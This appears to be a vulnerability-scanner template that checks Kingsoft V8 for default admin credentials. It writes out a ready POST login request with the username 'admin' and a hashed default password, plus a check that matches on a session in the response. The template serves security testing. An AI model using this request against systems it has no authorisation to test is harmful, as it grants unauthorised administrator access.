漏洞描述
Kingsoft V8 default admin login credentials were detected.
id: kingsoft-v8-default-password
info:
name: Kingsoft V8 Default Password
author: B1anda0
severity: high
verified: false
description: |-
Kingsoft V8 default admin login credentials were detected.
reference:
- https://www.tenable.com/plugins/nessus/105244
tags: default-login,kingsoft,v8
created: 2023/06/24
rules:
r0:
request:
method: POST
path: /inter/ajax.php?cmd=get_user_login_cmd
body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
follow_redirects: true
expression: response.status == 200 && response.body.ibcontains(b"admin") && response.body.ibcontains(b"usersession")
expression: r0()